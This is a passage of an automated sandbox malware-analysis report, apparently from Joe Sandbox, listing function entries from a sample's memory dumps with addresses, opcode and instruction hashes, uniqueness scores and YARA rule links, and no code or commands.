                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 55e3442f732d42266632c774c861b1250142941b733a02958b3f9b30fc55af39
                                                                      • Instruction ID: 1eedec617fbe08f7723c4538e1cd754bc58bce91f5e826903824bd2e823fe74a
                                                                      • Opcode Fuzzy Hash: 55e3442f732d42266632c774c861b1250142941b733a02958b3f9b30fc55af39
                                                                      • Instruction Fuzzy Hash: 8911B71092D5AB8EEA78AA2888745B47651FF90341F358775D46FAB4CAC92CBC8297C0
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D2090 Relevance: .1, Instructions: 67COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 12a98af35b86a92a50cbe9f564a952fa2e0cd25835c6e4b611ec15a8531d748b
                                                                      • Instruction ID: a1319bea6f7593b444cbfef0ecd058c3d44c7499a587f9f1ca54440c1dfa79d7
                                                                      • Opcode Fuzzy Hash: 12a98af35b86a92a50cbe9f564a952fa2e0cd25835c6e4b611ec15a8531d748b
                                                                      • Instruction Fuzzy Hash: 2611BB3084C6C98FDB12EF2488194E93FF0EF16311F1601EBE448C70A2D6389595C792
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D7040 Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 692dae903c795602bb1d9d8a6136a4f1d2008cef561fa4fe32d7f8f87738b120
                                                                      • Instruction ID: 8fa77523e09fee50cf12d3ddc7457f971e0505c562ab722f1565732ee2e396d8
                                                                      • Opcode Fuzzy Hash: 692dae903c795602bb1d9d8a6136a4f1d2008cef561fa4fe32d7f8f87738b120
                                                                      • Instruction Fuzzy Hash: A811C13191DE4A8EEF64BF2484115B67BA5FF44382F40463AD44EC35C2CE28F8058391
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D1840 Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4110d546ef64c67724f77d2b6cbedcbcef07d9b8e3668520a4cba05ac08d9b5f
                                                                      • Instruction ID: 847852e723df002df4609e4b0e690aa6e99df8b20f75443ed4f7d898b275db2c
                                                                      • Opcode Fuzzy Hash: 4110d546ef64c67724f77d2b6cbedcbcef07d9b8e3668520a4cba05ac08d9b5f
                                                                      • Instruction Fuzzy Hash: 1211C132A1EA494EEBA8FF2490118B677A1FF44281F40063AE44EC36C2DE28F9058350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CB0B0 Relevance: .1, Instructions: 65COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 9487bdc2f9fbf4fa028074ce6a950d66a167a19a3c1cc5e928eb1c90a7265de2
                                                                      • Instruction ID: 9487321e5e11036f2670f01094ce884009a8dc901726084e880a6e43002d244f
                                                                      • Opcode Fuzzy Hash: 9487bdc2f9fbf4fa028074ce6a950d66a167a19a3c1cc5e928eb1c90a7265de2
                                                                      • Instruction Fuzzy Hash: 31119131A1DA495EEF68BF2580115B677A1FF94391F40063AD44EC3692CE28E449C391
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C88ED Relevance: .1, Instructions: 63COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: f37aade2a15040bdc51050b910399fba308d7a5891918a8fff314b803d30a01a
                                                                      • Instruction ID: b9b04fb50601600cff37ca817d1e015a5eda331fed040f871479912fd631288d
                                                                      • Opcode Fuzzy Hash: f37aade2a15040bdc51050b910399fba308d7a5891918a8fff314b803d30a01a
                                                                      • Instruction Fuzzy Hash: A2217F31D1C98DDFDFA8EF58C490AECBBB1FF98350F14007AD10AE7291CA24A9058B45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D16BE Relevance: .1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c7df0233eff02b5f4c32fbc417be4ddb607ada2831cdf1a03d81c873e36fa55a
                                                                      • Instruction ID: ebf59b74c7fed4681a67d20508ac1e514a3dac3298404187e85e487bccbd0499
                                                                      • Opcode Fuzzy Hash: c7df0233eff02b5f4c32fbc417be4ddb607ada2831cdf1a03d81c873e36fa55a
                                                                      • Instruction Fuzzy Hash: DA114432609A4A8FEB69EE18D4156E43395FF443D2F14023BE80AC36C1CE38E940C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D6EBE Relevance: .1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d1d862bd30c020aa863ce7a802710d994e0142bd6f401bf67f142b5cfad5169f
                                                                      • Instruction ID: 6c935aa421b2a7237900b91df1f6b491f4521e526b3960443ec329a774cd8ca0
                                                                      • Opcode Fuzzy Hash: d1d862bd30c020aa863ce7a802710d994e0142bd6f401bf67f142b5cfad5169f
                                                                      • Instruction Fuzzy Hash: C4112632609A4A8FEF25AF18D4156E577A5FF943D2F04423BE909C36D2CB39E850C791
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CAF2E Relevance: .1, Instructions: 61COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 85340e7b0e54a6c6e0dbc9e33f787deec9cc68586d9fb3f4dfc3913e8ae93d75
                                                                      • Instruction ID: ad1ee7d282c503912cdbf95ae4c22274a389dc3b7eb97b6c0b9ddde21efd8202
                                                                      • Opcode Fuzzy Hash: 85340e7b0e54a6c6e0dbc9e33f787deec9cc68586d9fb3f4dfc3913e8ae93d75
                                                                      • Instruction Fuzzy Hash: 49116232609A4A8FEB28AE18D4122F873A0FF44392F10013BE91EC36D2CB39E841C350
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10C40 Relevance: .1, Instructions: 58COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2327feac575ff68f9dfd6f6db440acb5880f94580612a74f64570c63b4a5e64f
                                                                      • Instruction ID: db08faa46ada67e9db2345921337a0bf98e4d9c9e6dcea249f4c592bfa3ce71f
                                                                      • Opcode Fuzzy Hash: 2327feac575ff68f9dfd6f6db440acb5880f94580612a74f64570c63b4a5e64f
                                                                      • Instruction Fuzzy Hash: CC11E331E0D6AA8EE702BB24D8142EA7B70EFC2351F0445B3D844DB1D2DB386909CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10C48 Relevance: .1, Instructions: 52COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: d5bde6d6f35959f717edb68d7dfb3dde94d2de74f40a992ca4ca7e97df6689aa
                                                                      • Instruction ID: 033e422e8362a987e2e189256e2cca77f7c792c30e9afc259e27a6f2fcecce2e
                                                                      • Opcode Fuzzy Hash: d5bde6d6f35959f717edb68d7dfb3dde94d2de74f40a992ca4ca7e97df6689aa
                                                                      • Instruction Fuzzy Hash: 7A11E171D0D6AA8EE702BB24C8142EA7B70EF82350F0441B6D844DB2D2DF3C6904CB99
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D6CE8 Relevance: .0, Instructions: 49COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 616226c0e24274b96d7a3a0ceddaa9372abbce412a643d676c270c05d7f90188
                                                                      • Instruction ID: d5d945c17050539bc3e1237544512f607959f93acb1d179551a464de45992494
                                                                      • Opcode Fuzzy Hash: 616226c0e24274b96d7a3a0ceddaa9372abbce412a643d676c270c05d7f90188
                                                                      • Instruction Fuzzy Hash: 6201A23144E7C94FD717AF205C212E57FA0FF02240F5A82ABD458CB0D3D66CA955C382
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C8962 Relevance: .0, Instructions: 48COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da33c2fba2dbd98646111d5e6d6a1bc3dc991fd3197ec845237858a910e5666e
                                                                      • Instruction ID: a83d8b2891f3c0ba4e99e82e0e04289a31b66af484742c6943ea003dc3803797
                                                                      • Opcode Fuzzy Hash: da33c2fba2dbd98646111d5e6d6a1bc3dc991fd3197ec845237858a910e5666e
                                                                      • Instruction Fuzzy Hash: 7811A271A1985DDFDFA8EF88D490AADBBB1FF98344F14006AD10AE3291CA34A905CB55
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F106A5 Relevance: .0, Instructions: 45COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 7355d4ece654dbcb01b08b36631f46f752b24e41190a7467d01c66a8cc7e4834
                                                                      • Instruction ID: ce9cde3c89a5e18a6a288ea7dc4f0ad7eccf486e55179ebcc1cb4e1cb47b4f0b
                                                                      • Opcode Fuzzy Hash: 7355d4ece654dbcb01b08b36631f46f752b24e41190a7467d01c66a8cc7e4834
                                                                      • Instruction Fuzzy Hash: 89017C3180DA1E9FEB81FF58A4041EDB7A0FF94350F100432E808C2191EB396990CB85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D60B0 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: e76ed95fa65d890501f96e51be066d4107ce5b4df7640abd24564ce3113a9ea8
                                                                      • Instruction ID: a14e07d92e40a8df867dd753c41617e6cf46c6b7181153924984d646fafa0e0a
                                                                      • Opcode Fuzzy Hash: e76ed95fa65d890501f96e51be066d4107ce5b4df7640abd24564ce3113a9ea8
                                                                      • Instruction Fuzzy Hash: 1401DA7081894D9FDF85EF58C849AEE7BF0FF68305F10456AE419D7151DB35A590CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F32950 Relevance: .0, Instructions: 44COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f2b000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2fe980e9196a862dd6a8247f0b70e587ae7197b35c5d1b70796fe91978fdf311
                                                                      • Instruction ID: c99bbb6e0c5dd87ab3091c6790214988c1506515a5e1970d7a61d163622ea209
                                                                      • Opcode Fuzzy Hash: 2fe980e9196a862dd6a8247f0b70e587ae7197b35c5d1b70796fe91978fdf311
                                                                      • Instruction Fuzzy Hash: AD01E17090894D9FDF45EF68C449AAA7BF0FF28305F00056A985DD3160DB349595CB80
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495D1DA9 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 78abe38d2cd2385a098f43cac302cff5cb1ddf5d9bdf94fc95563e92d048685e
                                                                      • Instruction ID: 740a6a036285506f5768ba208f24740f02c78267916421e1ff4f293cae7769c4
                                                                      • Opcode Fuzzy Hash: 78abe38d2cd2385a098f43cac302cff5cb1ddf5d9bdf94fc95563e92d048685e
                                                                      • Instruction Fuzzy Hash: 17018F31908A8C8FCF8AEF24C859AE97FB1FF25301F0501DAD409C71A2D7359994CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8496F8761 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3532843938.00007FF8496F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8496F0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8496f0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3f5ee477522e8705ef0a07b2ec3a818fd1935de4a4645b200822099426f59002
                                                                      • Instruction ID: f610729091399b9d0f89c000a52a39b1a8dcb1e615e107523b487315759f5a73
                                                                      • Opcode Fuzzy Hash: 3f5ee477522e8705ef0a07b2ec3a818fd1935de4a4645b200822099426f59002
                                                                      • Instruction Fuzzy Hash: BE014671919288CFCB19EF28C9826ED3BA0FF59744F1502AAE84983291DB34A915CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F10B95 Relevance: .0, Instructions: 43COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cce624de875da24b4ddef6973dc9599dd59f3c753037d2c045b679e8045e7f9c
                                                                      • Instruction ID: 8fb83fe69eb3a39a37de06ba810787dd01dea01c61dc2ebeb756332eb2292592
                                                                      • Opcode Fuzzy Hash: cce624de875da24b4ddef6973dc9599dd59f3c753037d2c045b679e8045e7f9c
                                                                      • Instruction Fuzzy Hash: F801D23092864DCFCB44EF18D885AE97BE0FB58344F140169E859D3250D734E960CB81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CEF7A Relevance: .0, Instructions: 41COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: da041884084f4cdd46ef7d3e8766c0bc062f5c31230dba6b5188dd5442e1972c
                                                                      • Instruction ID: 3b28e75cb08e10f02dff2a65ea521f40583af15957dae67dfab979ffd06acb7b
                                                                      • Opcode Fuzzy Hash: da041884084f4cdd46ef7d3e8766c0bc062f5c31230dba6b5188dd5442e1972c
                                                                      • Instruction Fuzzy Hash: CD01627190D8599FDB94FF64C865BE97BB1EB19740F6500E8C40EE3292CE296985CF10
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490D56D2 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: bb6fb3b29d687697cb63e561723c63c4d299bffd51015c502b17f67f2d9ff585
                                                                      • Instruction ID: 7f19ee58e12a5361d2427ff7f5a0b1efa60fa5dde126055f90c3d6d865917c85
                                                                      • Opcode Fuzzy Hash: bb6fb3b29d687697cb63e561723c63c4d299bffd51015c502b17f67f2d9ff585
                                                                      • Instruction Fuzzy Hash: A3F0C23184E3C59FD726AF7088154A97FB4AF02240B1801F6E445C70A2C56DDA16C351
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CFED2 Relevance: .0, Instructions: 39COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 3321bb664806d97aaede2b4f0a48671cbe73cccec244c8af62700689dd64d29a
                                                                      • Instruction ID: aa578ef8e41a1bd8940bfd5a0ff49c8cbbab2c838006ad0d1b5aa04515293e7b
                                                                      • Opcode Fuzzy Hash: 3321bb664806d97aaede2b4f0a48671cbe73cccec244c8af62700689dd64d29a
                                                                      • Instruction Fuzzy Hash: 2FF0623188E2C59FDB2AAF7098515E93FA4EF43244B1540F6E146C6093C56D9A16C752
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8495CC55C Relevance: .0, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3529233109.00007FF8495C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8495C0000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8495c0000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 6b508466c41f0980cc859cb08187389b989a389519a8634e333d07363a30f9b0
                                                                      • Instruction ID: e81f1528b60a9f68c39839f9a2ca960b712d84613e7c2a6168016abb219efa63
                                                                      • Opcode Fuzzy Hash: 6b508466c41f0980cc859cb08187389b989a389519a8634e333d07363a30f9b0
                                                                      • Instruction Fuzzy Hash: C6016070909A6D8FDFA8DF18D894BA9B7B1FB68300F1041AAD04EE7250CB719A85CF40
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F30DC8 Relevance: .0, Instructions: 38COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F2B000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F2B000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f2b000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 4328706a23120d39b904321d3e6ff17e60507e53226f002455f7df2083354777
                                                                      • Instruction ID: 6191210c49052d7cfd4f12e52fdbe319fa8156baac5084c08008bc1503518415
                                                                      • Opcode Fuzzy Hash: 4328706a23120d39b904321d3e6ff17e60507e53226f002455f7df2083354777
                                                                      • Instruction Fuzzy Hash: A601FB75E08A1A8FEB18EB48C4546BE77B1FB94351F50063BC81AD72D1CF786A418B44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C9742 Relevance: .0, Instructions: 36COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 07c32e1f4d6a8780c483dac6f52f70f58ae558736424c6ac1167199cb984d9ca
                                                                      • Instruction ID: 97e3485c5b87cee293ae08a83969adfc64fd2ad866fcf5724bc6c759859d6e3d
                                                                      • Opcode Fuzzy Hash: 07c32e1f4d6a8780c483dac6f52f70f58ae558736424c6ac1167199cb984d9ca
                                                                      • Instruction Fuzzy Hash: 45F0903144E2C59FDB26EF7088554EA3FB4EF43244F1501F6E096C60A2CA6D5656C761
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490C816D Relevance: .0, Instructions: 35COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: cb42e259d74506c71db8fc21d3fb9afcb31c150096f21822c3c98233497c7ed4
                                                                      • Instruction ID: 6b25d5e64be9346f334e9de51151413f75cb7438cf4945213474a79a9e291929
                                                                      • Opcode Fuzzy Hash: cb42e259d74506c71db8fc21d3fb9afcb31c150096f21822c3c98233497c7ed4
                                                                      • Instruction Fuzzy Hash: 9B01E830E085198FDB58EF44D855ABDB3B6FB98351F10427EC80AA7290CB35A946CF44
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF848F113A0 Relevance: .0, Instructions: 33COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3515018137.00007FF848F10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F10000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff848f10000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: 2db417d7cc8601902ff7404d59868886f0e21321b1e53041ae323a95de23090e
                                                                      • Instruction ID: 2edfe82b8ab59776e32a1c17c02721208f69bd43044a5649b232702bc94364ca
                                                                      • Opcode Fuzzy Hash: 2db417d7cc8601902ff7404d59868886f0e21321b1e53041ae323a95de23090e
                                                                      • Instruction Fuzzy Hash: 71F0A970918A4D9FDF95EF58D448AAA7BE0FF28345F040465E819C3260D730E594CB84
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00007FF8490CE528 Relevance: .0, Instructions: 31COMMON
                                                                      Download Yara Rule
                                                                      Memory Dump Source
                                                                      • Source File: 0000000C.00000002.3518851591.00007FF8490C8000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8490C8000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_12_2_7ff8490c8000_vVSUwBXtljAfFANPiZBBPFzlgh.jbxd
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID:
                                                                      • API String ID:
                                                                      • Opcode ID: c5fba4b37a7fb1d64f242a6442f76939f9c817302a7324bed3d09e9d02c9ac25
                                                                      • Instruction ID: ddbc5632ab2961b8a5665f92f704dafea1c89697c80793cd41a75cdc93ef7b90
                                                                      • Opcode Fuzzy Hash: c5fba4b37a7fb1d64f242a6442f76939f9c817302a7324bed3d09e9d02c9ac25
